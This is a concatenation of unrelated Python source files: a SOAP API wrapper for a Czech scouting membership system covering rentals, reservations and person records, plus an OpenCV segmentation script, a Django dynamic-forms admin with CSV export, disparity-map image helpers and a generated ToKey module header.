return self._client.service.OccupationRentReservationAllOverview({"ID_Login": ID_Login, "ID_OccupationRent": ID_OccupationRent, "ID": ID, "ID_User": ID_User, "ID_OccupationRentReservationState": ID_OccupationRentReservationState})
# Načíst seznam rezervací půjčitelné jednotky
def OccupationRentReservationAll(self, ID_Login, ID_OccupationRent, ID, ID_User, ID_OccupationRentReservationState=None):
return self._client.service.OccupationRentReservationAll({"ID_Login": ID_Login, "ID_OccupationRent": ID_OccupationRent, "ID": ID, "ID_User": ID_User, "ID_OccupationRentReservationState": ID_OccupationRentReservationState})
# Smazat rezervaci půjčitelné jednotky
def OccupationRentReservationDelete(self, ID_Login, ID):
return self._client.service.OccupationRentReservationDelete({"ID_Login": ID_Login, "ID": ID})
# Načíst detail rezervace půjčitelné jednotky
def OccupationRentReservationDetail(self, ID_Application, ID_Login, ID):
return self._client.service.OccupationRentReservationDetail({"ID_Application": ID_Application, "ID_Login": ID_Login, "ID": ID})
# Založit rezervaci půjčitelné jednotky
def OccupationRentReservationInsert(self, ID_Login, ID, ID_User, ID_Occupation, ID_OccupationRent, ID_Unit, EstimatedStart, EstimatedEnd, RealStart, RealEnd, EstimatedPersonCount, LastUpdate, Created, ID_OccupationRentReservationState=None, OccupationRentReservationState=None, OccupationRent=None, Unit=None, RegistrationNumber=None, ContactPerson=None, ContactPhone=None, ContactMail=None, RejectionReason=None, Note=None):
return self._client.service.OccupationRentReservationInsert({"ID_Login": ID_Login, "ID": ID, "ID_User": ID_User, "ID_Occupation": ID_Occupation, "ID_OccupationRent": ID_OccupationRent, "ID_Unit": ID_Unit, "EstimatedStart": EstimatedStart, "EstimatedEnd": EstimatedEnd, "RealStart": RealStart, "RealEnd": RealEnd, "EstimatedPersonCount": EstimatedPersonCount, "LastUpdate": LastUpdate, "Created": Created, "ID_OccupationRentReservationState": ID_OccupationRentReservationState, "OccupationRentReservationState": OccupationRentReservationState, "OccupationRent": OccupationRent, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "ContactPerson": ContactPerson, "ContactPhone": ContactPhone, "ContactMail": ContactMail, "RejectionReason": RejectionReason, "Note": Note})
# Upravit rezervaci půjčitelné jednotky
def OccupationRentReservationUpdate(self, ID_Login, ID, ID_User, ID_Occupation, ID_OccupationRent, ID_Unit, EstimatedStart, EstimatedEnd, RealStart, RealEnd, EstimatedPersonCount, LastUpdate, Created, ID_OccupationRentReservationState=None, OccupationRentReservationState=None, OccupationRent=None, Unit=None, RegistrationNumber=None, ContactPerson=None, ContactPhone=None, ContactMail=None, RejectionReason=None, Note=None):
return self._client.service.OccupationRentReservationUpdate({"ID_Login": ID_Login, "ID": ID, "ID_User": ID_User, "ID_Occupation": ID_Occupation, "ID_OccupationRent": ID_OccupationRent, "ID_Unit": ID_Unit, "EstimatedStart": EstimatedStart, "EstimatedEnd": EstimatedEnd, "RealStart": RealStart, "RealEnd": RealEnd, "EstimatedPersonCount": EstimatedPersonCount, "LastUpdate": LastUpdate, "Created": Created, "ID_OccupationRentReservationState": ID_OccupationRentReservationState, "OccupationRentReservationState": OccupationRentReservationState, "OccupationRent": OccupationRent, "Unit": Unit, "RegistrationNumber": RegistrationNumber, "ContactPerson": ContactPerson, "ContactPhone": ContactPhone, "ContactMail": ContactMail, "RejectionReason": RejectionReason, "Note": Note})
# Potvrdit rezervaci půjčitelné jednotky
def OccupationRentReservationUpdateConfirm(self, ID_Login, ID):
return self._client.service.OccupationRentReservationUpdateConfirm({"ID_Login": ID_Login, "ID": ID})
# Zrušit rezervaci půjčitelné jednotky
def OccupationRentReservationUpdateReject(self, ID_Login, ID, RejectionReason=None):
return self._client.service.OccupationRentReservationUpdateReject({"ID_Login": ID_Login, "ID": ID, "RejectionReason": RejectionReason})
# Upravit užívání nemovitosti
def OccupationUpdateRealty(self, ID, ID_Login, Publish, IsBorrowable, Capacity, BorrowableForeign, IsBookable, ID_TempFilePhotoExtension, ID_TempFileRequirementExtension, Note=None, DisplayName=None, Person=None, Email=None, Phone=None, Web=None, Fotogallery=None, ContactNote=None, Requirements=None, CapacityNote=None, AccommodationNote=None, BookUrl=None, Tags=None, Equipment=None, Languages=None):
return self._client.service.OccupationUpdateRealty({"ID": ID, "ID_Login": ID_Login, "Publish": Publish, "IsBorrowable": IsBorrowable, "Capacity": Capacity, "BorrowableForeign": BorrowableForeign, "IsBookable": IsBookable, "ID_TempFilePhotoExtension": ID_TempFilePhotoExtension, "ID_TempFileRequirementExtension": ID_TempFileRequirementExtension, "Note": Note, "DisplayName": DisplayName, "Person": Person, "Email": Email, "Phone": Phone, "Web": Web, "Fotogallery": Fotogallery, "ContactNote": ContactNote, "Requirements": Requirements, "CapacityNote": CapacityNote, "AccommodationNote": AccommodationNote, "BookUrl": BookUrl, "Tags": Tags, "Equipment": Equipment, "Languages": Languages})
# Založit užívání nemovitosti
def OccupationInsertRealty(self, ID_Login, ID_Unit, ID_Realty, ID_RealtyType, Publish, IsBorrowable, Capacity, BorrowableForeign, IsBookable, ID_TempFilePhotoExtension, ID_TempFileRequirementExtension, BasePrice, ScoutPrice, ChildPrice, Note=None, DisplayName=None, Person=None, Email=None, Phone=None, Web=None, Fotogallery=None, ContactNote=None, Requirements=None, CapacityNote=None, AccommodationNote=None, Tags=None, Equipment=None, Languages=None, ID_OccupationRentPriceType=None, PriceNote=None):
return self._client.service.OccupationInsertRealty({"ID_Login": ID_Login, "ID_Unit": ID_Unit, "ID_Realty": ID_Realty, "ID_RealtyType": ID_RealtyType, "Publish": Publish, "IsBorrowable": IsBorrowable, "Capacity": Capacity, "BorrowableForeign": BorrowableForeign, "IsBookable": IsBookable, "ID_TempFilePhotoExtension": ID_TempFilePhotoExtension, "ID_TempFileRequirementExtension": ID_TempFileRequirementExtension, "BasePrice": BasePrice, "ScoutPrice": ScoutPrice, "ChildPrice": ChildPrice, "Note": Note, "DisplayName": DisplayName, "Person": Person, "Email": Email, "Phone": Phone, "Web": Web, "Fotogallery": Fotogallery, "ContactNote": ContactNote, "Requirements": Requirements, "CapacityNote": CapacityNote, "AccommodationNote": AccommodationNote, "Tags": Tags, "Equipment": Equipment, "Languages": Languages, "ID_OccupationRentPriceType": ID_OccupationRentPriceType, "PriceNote": PriceNote})
# Načíst seznam jazyků
def OccupationLanguageAll(self, ID_Login, ID_Application, ID=None, DisplayName=None):
return self._client.service.OccupationLanguageAll({"ID_Login": ID_Login, "ID_Application": ID_Application, "ID": ID, "DisplayName": DisplayName})
# Načíst seznam půjčitelných jednotek
def OccupationRentAll(self, ID_Login, ID_Application, ID_Occupation, ID, DisplayName=None):
return self._client.service.OccupationRentAll({"ID_Login": ID_Login, "ID_Application": ID_Application, "ID_Occupation": ID_Occupation, "ID": ID, "DisplayName": DisplayName})
# Načíst detail půjčitelné jednotky
def OccupationRentDetail(self, ID_Login, ID):
return self._client.service.OccupationRentDetail({"ID_Login": ID_Login, "ID": ID})
# Načíst seznam vybavení
def OccupationRentEquipmentAll(self, ID_Login, ID_Application, ID_Occupation, ID, ID_OccupationEquipment):
return self._client.service.OccupationRentEquipmentAll({"ID_Login": ID_Login, "ID_Application": ID_Application, "ID_Occupation": ID_Occupation, "ID": ID, "ID_OccupationEquipment": ID_OccupationEquipment})
# Založit půjčitelnou jednotku
def OccupationRentInsert(self, ID_Login, ID, ID_Occupation, IsActive, ID_TempFilePhotoExtension, ID_TempFileRequirementExtension, Capacity, BorrowableForeign, IsBookable, LastUpdate, ID_DocumentRequirement, ID_DocumentPhoto, DisplayName=None, Email=None, Phone=None, Web=None, PhotoExtension=None, Fotogallery=None, ContactNote=None, RequirementExtension=None, Requirements=None, CapacityNote=None, AccommodationNote=None, Person=None, Equipment=None, Tags=None, Languages=None):
return self._client.service.OccupationRentInsert({"ID_Login": ID_Login, "ID": ID, "ID_Occupation": ID_Occupation, "IsActive": IsActive, "ID_TempFilePhotoExtension": ID_TempFilePhotoExtension, "ID_TempFileRequirementExtension": ID_TempFileRequirementExtension, "Capacity": Capacity, "BorrowableForeign": BorrowableForeign, "IsBookable": IsBookable, "LastUpdate": LastUpdate, "ID_DocumentRequirement": ID_DocumentRequirement, "ID_DocumentPhoto": ID_DocumentPhoto, "DisplayName": DisplayName, "Email": Email, "Phone": Phone, "Web": Web, "PhotoExtension": PhotoExtension, "Fotogallery": Fotogallery, "ContactNote": ContactNote, "RequirementExtension": RequirementExtension, "Requirements": Requirements, "CapacityNote": CapacityNote, "AccommodationNote": AccommodationNote, "Person": Person, "Equipment": Equipment, "Tags": Tags, "Languages": Languages})
# Načíst seznam jazyků
def OccupationRentLanguageAll(self, ID_Login, ID_Application, ID_Occupation, ID, ID_OccupationLanguage=None):
return self._client.service.OccupationRentLanguageAll({"ID_Login": ID_Login, "ID_Application": ID_Application, "ID_Occupation": ID_Occupation, "ID": ID, "ID_OccupationLanguage": ID_OccupationLanguage})
# Načíst seznam cen za pronájem
def OccupationRentPriceAll(self, ID_Login, ID_Occupation, ID, ID_OccupationRentPriceType=None):
return self._client.service.OccupationRentPriceAll({"ID_Login": ID_Login, "ID_Occupation": ID_Occupation, "ID": ID, "ID_OccupationRentPriceType": ID_OccupationRentPriceType})
# Smazat cenu za pronájem
def OccupationRentPriceDelete(self, ID_Login, ID):
return self._client.service.OccupationRentPriceDelete({"ID_Login": ID_Login, "ID": ID})
# Načíst detail ceny za pronájem
def OccupationRentPriceDetail(self, ID_Login, ID):
return self._client.service.OccupationRentPriceDetail({"ID_Login": ID_Login, "ID": ID})
# Založit cenu za pronájem
def OccupationRentPriceInsert(self, ID_Login, ID, ID_Occupation, ID_OccupationRent, BasePrice, ScoutPrice, ChildPrice, OccupationRent=None, ID_OccupationRentPriceType=None, OccupationRentPriceType=None, PriceNote=None):
return self._client.service.OccupationRentPriceInsert({"ID_Login": ID_Login, "ID": ID, "ID_Occupation": ID_Occupation, "ID_OccupationRent": ID_OccupationRent, "BasePrice": BasePrice, "ScoutPrice": ScoutPrice, "ChildPrice": ChildPrice, "OccupationRent": OccupationRent, "ID_OccupationRentPriceType": ID_OccupationRentPriceType, "OccupationRentPriceType": OccupationRentPriceType, "PriceNote": PriceNote})
# Načíst seznam typů ceny
def OccupationRentPriceTypeAll(self, ID_Login, ID_Application, ID=None, DisplayName=None):
return self._client.service.OccupationRentPriceTypeAll({"ID_Login": ID_Login, "ID_Application": ID_Application, "ID": ID, "DisplayName": DisplayName})
# Upravit cenu za pronájem
def OccupationRentPriceUpdate(self, ID_Login, ID, ID_Occupation, ID_OccupationRent, BasePrice, ScoutPrice, ChildPrice, OccupationRent=None, ID_OccupationRentPriceType=None, OccupationRentPriceType=None, PriceNote=None):
return self._client.service.OccupationRentPriceUpdate({"ID_Login": ID_Login, "ID": ID, "ID_Occupation": ID_Occupation, "ID_OccupationRent": ID_OccupationRent, "BasePrice": BasePrice, "ScoutPrice": ScoutPrice, "ChildPrice": ChildPrice, "OccupationRent": OccupationRent, "ID_OccupationRentPriceType": ID_OccupationRentPriceType, "OccupationRentPriceType": OccupationRentPriceType, "PriceNote": PriceNote})
# Načíst seznam tagů pronajímatelné jednotky
def OccupationRentTagAll(self, ID_Login, ID_Occupation, ID, ID_OccupationTag):
return self._client.service.OccupationRentTagAll({"ID_Login": ID_Login, "ID_Occupation": ID_Occupation, "ID": ID, "ID_OccupationTag": ID_OccupationTag})
# Upravit půjčitelnou jednotku
def OccupationRentUpdate(self, ID_Login, ID, ID_Occupation, IsActive, ID_TempFilePhotoExtension, ID_TempFileRequirementExtension, Capacity, BorrowableForeign, IsBookable, LastUpdate, ID_DocumentRequirement, ID_DocumentPhoto, DisplayName=None, Email=None, Phone=None, Web=None, PhotoExtension=None, Fotogallery=None, ContactNote=None, RequirementExtension=None, Requirements=None, CapacityNote=None, AccommodationNote=None, Person=None, Equipment=None, Tags=None, Languages=None):
return self._client.service.OccupationRentUpdate({"ID_Login": ID_Login, "ID": ID, "ID_Occupation": ID_Occupation, "IsActive": IsActive, "ID_TempFilePhotoExtension": ID_TempFilePhotoExtension, "ID_TempFileRequirementExtension": ID_TempFileRequirementExtension, "Capacity": Capacity, "BorrowableForeign": BorrowableForeign, "IsBookable": IsBookable, "LastUpdate": LastUpdate, "ID_DocumentRequirement": ID_DocumentRequirement, "ID_DocumentPhoto": ID_DocumentPhoto, "DisplayName": DisplayName, "Email": Email, "Phone": Phone, "Web": Web, "PhotoExtension": PhotoExtension, "Fotogallery": Fotogallery, "ContactNote": ContactNote, "RequirementExtension": RequirementExtension, "Requirements": Requirements, "CapacityNote": CapacityNote, "AccommodationNote": AccommodationNote, "Person": Person, "Equipment": Equipment, "Tags": Tags, "Languages": Languages})
# Načíst seznam tagů
def OccupationTagAll(self, ID_Login, ID, DisplayName=None):
return self._client.service.OccupationTagAll({"ID_Login": ID_Login, "ID": ID, "DisplayName": DisplayName})
# Načíst seznam typůtypu zákonného zástupce
def ParentTypeAll(self, ID_Login, ID_Application, ID=None, DisplayName=None):
return self._client.service.ParentTypeAll({"ID_Login": ID_Login, "ID_Application": ID_Application, "ID": ID, "DisplayName": DisplayName})
# Načíst seznam osob vzdělávací akce
def PersonAllEventEducationApi(self, ID_Login, ID_Application, ID_EventEducation):
return self._client.service.PersonAllEventEducationApi({"ID_Login": ID_Login, "ID_Application": ID_Application, "ID_EventEducation": ID_EventEducation})
# Načíst seznam osob
def PersonAllGlobalSearch(self, ID_Login, ID_Application, UseParentCode, IdentificationCode=None, FirstName=None, LastName=None, Name=None):
return self._client.service.PersonAllGlobalSearch({"ID_Login": ID_Login, "ID_Application": ID_Application, "UseParentCode": UseParentCode, "IdentificationCode": IdentificationCode, "FirstName": FirstName, "LastName": LastName, "Name": Name})
# Načíst seznam osob podle jména
def PersonAllExternal(self, ID_Login, ID_Application, ID, ID_User, Top, DisplayName=None):
return self._client.service.PersonAllExternal({"ID_Login": ID_Login, "ID_Application": ID_Application, "ID": ID, "ID_User": ID_User, "Top": Top, "DisplayName": DisplayName})
# Načíst osoby k synchronizace google skupiny
def PersonAllGoogleGroupSync(self, ID_Login, ID_GoogleGroup):
return self._client.service.PersonAllGoogleGroupSync({"ID_Login": ID_Login, "ID_GoogleGroup": ID_GoogleGroup})
# Načíst seznam osob
def PersonAllMemberCardPrint(self, ID_Login, ID_MemberCardPrint):
return self._client.service.PersonAllMemberCardPrint({"ID_Login": ID_Login, "ID_MemberCardPrint": ID_MemberCardPrint})
# Načíst osoby ke změně
def PersonChangeAllPersonChangeRequest(self, ID_Login, ID_PersonChangeRequest):
return self._client.service.PersonChangeAllPersonChangeRequest({"ID_Login": ID_Login, "ID_PersonChangeRequest": ID_PersonChangeRequest})
# Načíst detail nových dat u změny u osoby
def PersonChangeDetailChanges(self, ID_Login, ID_Application, AccessKey, ID):
return self._client.service.PersonChangeDetailChanges({"ID_Login": ID_Login, "ID_Application": ID_Application, "AccessKey": AccessKey, "ID": ID})
# Načíst detail změny u osoby
def PersonChangeDetail(self, ID_Login, ID_Application, AccessKey, ID):
return self._client.service.PersonChangeDetail({"ID_Login": ID_Login, "ID_Application": ID_Application, "AccessKey": AccessKey, "ID": ID})
# Založit změnu u osoby podle žádosti o změnu
def PersonChangeInsertPersonChangeRequestPerson(self, ID_Login, ID_PersonChangeRequestPerson, SendMessage):
return self._client.service.PersonChangeInsertPersonChangeRequestPerson({"ID_Login": ID_Login, "ID_PersonChangeRequestPerson": ID_PersonChangeRequestPerson, "SendMessage": SendMessage})
# Ověření kódu pro změnu údajů osoby
def PersonChangeOtherVerify(self, ID_Login, ID_Application, AccessKey, BirthDate, IsForeign, LastName=None, IdentificationCodeEnd=None, BirthCity=None):
return self._client.service.PersonChangeOtherVerify({"ID_Login": ID_Login, "ID_Application": ID_Application, "AccessKey": AccessKey, "BirthDate": BirthDate, "IsForeign": IsForeign, "LastName": LastName, "IdentificationCodeEnd": IdentificationCodeEnd, "BirthCity": BirthCity})
# Načíst detail žádosti změn u osoby
def PersonChangeRequestDetail(self, ID_Login, ID):
return self._client.service.PersonChangeRequestDetail({"ID_Login": ID_Login, "ID": ID})
# Založit žádost změn u osoby
def PersonChangeRequestInsert(self, ID_Login, ID, ID_Unit, Created, Sent, Text=None, Persons=None):
return self._client.service.PersonChangeRequestInsert({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "Created": Created, "Sent": Sent, "Text": Text, "Persons": Persons})
# Odeslat žádosti změn u osoby
def PersonChangeRequestUpdate(self, ID_Login, ID, ID_Unit, Created, Sent, Text=None, Persons=None):
return self._client.service.PersonChangeRequestUpdate({"ID_Login": ID_Login, "ID": ID, "ID_Unit": ID_Unit, "Created": Created, "Sent": Sent, "Text": Text, "Persons": Persons})
# Dokončit změny u osoby
def PersonChangeUpdateFinish(self, ID_Login, ID):
return self._client.service.PersonChangeUpdateFinish({"ID_Login": ID_Login, "ID": ID})
# Změnit stav u změny u osoby
def PersonChangeUpdateState(self, ID_Login, ID, ID_PersonChangeState=None):
return self._client.service.PersonChangeUpdateState({"ID_Login": ID_Login, "ID": ID, "ID_PersonChangeState": ID_PersonChangeState})
# Upravit změnu u osoby
def PersonChangeUpdate(self, ID_Login, ID_Application, AccessKey, OnlyValidate, Birthday, IsForeign, ID_DistrictBirth, ID_PersonParentPerson, ID_PersonParent, DeleteParent, ID_PersonParentPerson2, ID_PersonParent2, DeleteParent2, ID_Assurance, CheckCorrect, IsPostalSame, FirstName=None, LastName=None, ID_Sex=None, IdentificationCode=None, Address=None, Street=None, City=None, Postcode=None, State=None, PostalFirstLine=None, PostalAddress=None, PostalStreet=None, PostalCity=None, PostalPostcode=None, PostalState=None, Phone=None, Email=None, Note=None, MaidenName=None, ID_Citizenship=None, CitizenshipCustom=None, BirthCity=None, ID_ParentType=None, ParentTypeCustom=None, FirstNameParent=None, LastNameParent=None, EmailParent=None, PhoneParent=None, NoteParent=None, ParentNote=None, ID_ParentType2=None, ParentTypeCustom2=None, FirstNameParent2=None, LastNameParent2=None, EmailParent2=None, PhoneParent2=None, NoteParent2=None, Parent2Note=None, InsuranceNumber=None, Allergy=None, Drugs=None, HealthLimitation=None, BodySkills=None, School=None):
return self._client.service.PersonChangeUpdate({"ID_Login": ID_Login, "ID_Application": ID_Application, "AccessKey": AccessKey, "OnlyValidate": OnlyValidate, "Birthday": Birthday, "IsForeign": IsForeign, "ID_DistrictBirth": ID_DistrictBirth, "ID_PersonParentPerson": ID_PersonParentPerson, "ID_PersonParent": ID_PersonParent, "DeleteParent": DeleteParent, "ID_PersonParentPerson2": ID_PersonParentPerson2, "ID_PersonParent2": ID_PersonParent2, "DeleteParent2": DeleteParent2, "ID_Assurance": ID_Assurance, "CheckCorrect": CheckCorrect, "IsPostalSame": IsPostalSame, "FirstName": FirstName, "LastName": LastName, "ID_Sex": ID_Sex, "IdentificationCode": IdentificationCode, "Address": Address, "Street": Street, "City": City, "Postcode": Postcode, "State": State, "PostalFirstLine": PostalFirstLine, "PostalAddress": PostalAddress, "PostalStreet": PostalStreet, "PostalCity": PostalCity, "PostalPostcode": PostalPostcode, "PostalState": PostalState, "Phone": Phone, "Email": Email, "Note": Note, "MaidenName": MaidenName, "ID_Citizenship": ID_Citizenship, "CitizenshipCustom": CitizenshipCustom, "BirthCity": BirthCity, "ID_ParentType": ID_ParentType, "ParentTypeCustom": ParentTypeCustom, "FirstNameParent": FirstNameParent, "LastNameParent": LastNameParent, "EmailParent": EmailParent, "PhoneParent": PhoneParent, "NoteParent": NoteParent, "ParentNote": ParentNote, "ID_ParentType2": ID_ParentType2, "ParentTypeCustom2": ParentTypeCustom2, "FirstNameParent2": FirstNameParent2, "LastNameParent2": LastNameParent2, "EmailParent2": EmailParent2, "PhoneParent2": PhoneParent2, "NoteParent2": NoteParent2, "Parent2Note": Parent2Note, "InsuranceNumber": InsuranceNumber, "Allergy": Allergy, "Drugs": Drugs, "HealthLimitation": HealthLimitation, "BodySkills": BodySkills, "School": School})
# Načíst seznam kontaktů rodičů osoby
def PersonContactAllParent(self, ID_Login, ID_Person):
return self._client.service.PersonContactAllParent({"ID_Login": ID_Login, "ID_Person": ID_Person})
# Detail změny kontaktu
def PersonContactRequestDetail(self, ID_Login, ID):
return self._client.service.PersonContactRequestDetail({"ID_Login": ID_Login, "ID": ID})
# Detail změnu kontaktu podle kódu
def PersonContactRequestDetailCode(self, ID_Login, Code):
return self._client.service.PersonContactRequestDetailCode({"ID_Login": ID_Login, "Code": Code})
# Upravit změnu kontaktu
def PersonContactRequestUpdate(self, ID_Login, ID, ID_PersonContact, ValidTo, Created, ID_User, Completed, Code, ID_Person, IsCatalog, IsGa, ID_ContactRequestType=None, ContactRequestType=None, Person=None, ID_ContactType=None, ContactType=None, Value=None, Note=None):
return self._client.service.PersonContactRequestUpdate({"ID_Login": ID_Login, "ID": ID, "ID_PersonContact": ID_PersonContact, "ValidTo": ValidTo, "Created": Created, "ID_User": ID_User, "Completed": Completed, "Code": Code, "ID_Person": ID_Person, "IsCatalog": IsCatalog, "IsGa": IsGa, "ID_ContactRequestType": ID_ContactRequestType, "ContactRequestType": ContactRequestType, "Person": Person, "ID_ContactType": ID_ContactType, "ContactType": ContactType, "Value": Value, "Note": Note})
# Nastavit viditelnost kontaktu
def PersonContactUpdateHide(self, ID_Login, ID, IsHidden):
return self._client.service.PersonContactUpdateHide({"ID_Login": ID_Login, "ID": ID, "IsHidden": IsHidden})
# Načtení informací o datech pro změnu
def PersonDetailPersonChange(self, ID_Login, ID_Application, Code):
return self._client.service.PersonDetailPersonChange({"ID_Login": ID_Login, "ID_Application": ID_Application, "Code": Code})
# Ověření, zda má osoba nárok na časopis zdarma
def PersonDetailCanHaveFreeJournal(self, ID_Login, ID):
return self._client.service.PersonDetailCanHaveFreeJournal({"ID_Login": ID_Login, "ID": ID})
# Načíst informace pro dashboard
def PersonDetailDashboard(self, ID_Login):
return self._client.service.PersonDetailDashboard({"ID_Login": ID_Login})
# Načtení počtu přijatých a nepřečtených zpráv osoby
def PersonDetailMessageCount(self, ID_Login):
return self._client.service.PersonDetailMessageCount({"ID_Login": ID_Login})
# Ověření, zda je osoba členem organizace
def PersonDetailMembership(self, ID_Login, ID_Application, IdentificationCode=None):
return self._client.service.PersonDetailMembership({"ID_Login": ID_Login, "ID_Application": ID_Application, "IdentificationCode": IdentificationCode})
# Načíst seznam zákonných zástupce osoby
def PersonParentAll(self, ID_Login, ID_Application, ID_Person, ID, ID_PersonParent, ID_ParentType=None):
return self._client.service.PersonParentAll({"ID_Login": ID_Login, "ID_Application": ID_Application, "ID_Person": ID_Person, "ID": ID, "ID_PersonParent": ID_PersonParent, "ID_ParentType": ID_ParentType})
# Smazat zákonného zástupce osoby
def PersonParentDelete(self, ID_Login, ID):
return self._client.service.PersonParentDelete({"ID_Login": ID_Login, "ID": ID})
# Načíst detail zákonného zástupce osoby
def PersonParentDetail(self, ID_Login, ID):
return self._client.service.PersonParentDetail({"ID_Login": ID_Login, "ID": ID})
# Založit zákonného zástupce osoby
def PersonParentInsert(self, ID_Login, ID, ID_Person, ID_PersonParent, ParentHasAccount, Person=None, Parent=None, ID_ParentType=None, ParentType=None, FirstName=None, LastName=None, Phone=None, Email=None, Note=None, ParentNote=None, ParentCode=None):
return self._client.service.PersonParentInsert({"ID_Login": ID_Login, "ID": ID, "ID_Person": ID_Person, "ID_PersonParent": ID_PersonParent, "ParentHasAccount": ParentHasAccount, "Person": Person, "Parent": Parent, "ID_ParentType": ID_ParentType, "ParentType": ParentType, "FirstName": FirstName, "LastName": LastName, "Phone": Phone, "Email": Email, "Note": Note, "ParentNote": ParentNote, "ParentCode": ParentCode})
# Upravit zákonného zástupce osoby
def PersonParentUpdate(self, ID_Login, ID, ID_Person, ID_PersonParent, ParentHasAccount, Person=None, Parent=None, ID_ParentType=None, ParentType=None, FirstName=None, LastName=None, Phone=None, Email=None, Note=None, ParentNote=None, ParentCode=None):
return self._client.service.PersonParentUpdate({"ID_Login": ID_Login, "ID": ID, "ID_Person": ID_Person, "ID_PersonParent": ID_PersonParent, "ParentHasAccount": ParentHasAccount, "Person": Person, "Parent": Parent, "ID_ParentType": ID_ParentType, "ParentType": ParentType, "FirstName": FirstName, "LastName": LastName, "Phone": Phone, "Email": Email, "Note": Note, "ParentNote": ParentNote, "ParentCode": ParentCode})
|
import numpy as np
import cv2
import FeatureExtract
def seglist():
roiList = []
feature = []
img = cv2.imread('Pictures\\test1row.png')
#gray conversion of the image
gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
#image thresholding
ret, thresh = cv2.threshold(gray, 230, 255, cv2.THRESH_BINARY)
#contours is assigned all the cordinates of the contours
contours = cv2.findContours(thresh, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)[1]
for cnt in contours:
# Restricting the contour area
if cv2.contourArea(cnt) > 20 and cv2.contourArea(cnt) < 700:
[x, y, w, h] = cv2.boundingRect(cnt)
# Restricting the height of the contour
if h > 28:
cv2.rectangle(img, (x, y), (x + w, y + h), (0, 255, 0), 1)
roismall = gray[y:y + h, x:x + w]
roismall = np.float32(roismall)
resized_roismall = FeatureExtract.preprocess(roismall)
roiList.append(resized_roismall)
print("Extracting features for Contours")
for i in roiList:
feature.append(FeatureExtract.getGLCMFeatures(i))
return feature |
from bpyutils.util import _dict |
from datetime import date
from django import forms
from django.http import HttpResponse
from django.contrib import admin
from models import DynamicFieldValue, DynamicField, DynamicFormFieldRelation, DynamicForm, DynamicFormData
from StringIO import StringIO
from zipfile import ZipFile
import csv
class DynamicFieldValue_Inline(admin.TabularInline):
model = DynamicFieldValue
extra = 0
class DynamicFieldAdminForm(forms.ModelForm):
class Meta:
model = DynamicField
def __init__(self, *args, **kwargs):
super(DynamicFieldAdminForm, self).__init__(*args, **kwargs)
self.fields['default'].queryset = self.instance.values.all() if self.instance else DynamicFieldValue.objects.none()
class DynamicFieldAdmin(admin.ModelAdmin):
model = DynamicField
inlines = [DynamicFieldValue_Inline]
form = DynamicFieldAdminForm
list_display = ['label', 'type', 'required', 'default', 'help_text']
list_editable = ['type', 'required', 'help_text']
list_filter = ['dynamicform__name']
class DynamicFormFieldRelation_Inline(admin.TabularInline):
model = DynamicFormFieldRelation
extra = 0
class DynamicFormAdmin(admin.ModelAdmin):
model = DynamicForm
fieldsets = (
(None, {'fields': ['name', 'slug', 'type', 'success_url', 'notification_emails']}),
('Confirmation e-mail', {'classes': ['collapse'], 'fields': ['send_confirmation', 'email_recipients', 'email_subject', 'email_content']}),
)
inlines = [DynamicFormFieldRelation_Inline]
prepopulated_fields = {'slug': ['name']}
list_display = ['name', 'slug', 'type', 'success_url']
list_editable = ['type', 'success_url']
actions = ['export_data_as_csv']
def export_form_data_as_csv(self, dynamicform, output):
writer = csv.DictWriter(output, fieldnames=dynamicform.field_names)
writer.writerow(dict((f, f) for f in dynamicform.field_names))
for row in dynamicform.data_as_dicts():
writer.writerow(row)
def export_data_as_csv(self, request, queryset):
output = StringIO()
if queryset.count() == 1:
self.export_form_data_as_csv(queryset.get(), output)
mimetype = 'text/csv'
filename = '%s.%s.csv' % (queryset.get().name, date.today())
else:
zipfile = ZipFile(output, 'w')
for dynamicform in queryset:
csv_output = StringIO()
self.export_form_data_as_csv(dynamicform, csv_output)
filename = '%s.%s.csv' % (dynamicform.name, date.today())
zipfile.writestr(filename, csv_output.getvalue())
zipfile.close()
mimetype = 'application/zip'
filename = 'dynamicforms-data.%s.zip' % date.today()
response = HttpResponse(output.getvalue(), mimetype=mimetype)
response['Content-Disposition'] = 'attachment; filename=%s' % filename
return response
class DynamicFormDataAdmin(admin.ModelAdmin):
model = DynamicFormData
list_display = ['dynamicform', 'timestamp']
list_filter = ['dynamicform__name']
admin.site.register(DynamicField, DynamicFieldAdmin)
admin.site.register(DynamicForm, DynamicFormAdmin)
admin.site.register(DynamicFormData, DynamicFormDataAdmin)
|
import os
import os.path as osp
import numpy as np
from glob import glob
from tqdm import tqdm
import mmcv
def disp_modulate(disp_map, max_value=1):
""" Transfer the value of disp maps to the [img] range -1 ~ 1
"""
EPS = 1e-3
Gamma = 0.3
EXPAND = 10
disp_map = (disp_map * EXPAND).astype(np.float32)
zero_part1 = disp_map < EPS
zero_part2 = disp_map > -EPS
zero_part = zero_part1 * zero_part2
sign = np.sign(disp_map)
disp_map = np.abs(disp_map)
disp_img = np.power(disp_map, Gamma).clip(0, 1)
disp_img = disp_img * sign
disp_img[zero_part] = 0 # range: [-1, 1]
if max_value == 255:
disp_img = (disp_img + 1) / 2 * 255
disp_img = np.rint(disp_img).clip(0, 255).astype(np.uint8)
return disp_img
def disp_demodulate(disp_img):
""" Transfer the values of visualized disp images
from [0, 255] to the normal disp values
"""
EXPAND = 10
iGamma = 10 / 3
assert disp_img.dtype == np.uint8
zero_part1 = disp_img == 127
zero_part2 = disp_img == 128
zero_part = zero_part1 & zero_part2
disp_img = disp_img / 127.5 - 1
sign = np.sign(disp_img)
disp_img[zero_part] = 0
disp_img = np.abs(disp_img).clip(0, 1)
disp_map = np.power(disp_img, iGamma) / EXPAND
disp_map = disp_map * sign
return disp_map
if __name__ == '__main__':
base_path = '/home/xuxudong/3D/data/THUman/dataset'
folders = sorted(glob(osp.join(base_path, 'results_gyc_20181010_hsc_1_M', '*')))
for idx, folder in enumerate(folders):
disp_file = osp.join(folder, 'disp_uv_map_256.npy')
out_folder = 'outputs/UV_maps/real'
disp_map = np.load(disp_file)[0]
disp_img = disp_modulate(disp_map, max_value=255)
mmcv.imwrite(disp_img, osp.join(out_folder, f'{idx}.jpg'))
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
# --------------------------------------------------------------------------------------------
# - Generated by tools/entrypoint_compiler.py: do not edit by hand
"""
ToKey
"""
__all__ = ["ToKey"]
from sklearn.base import TransformerMixin
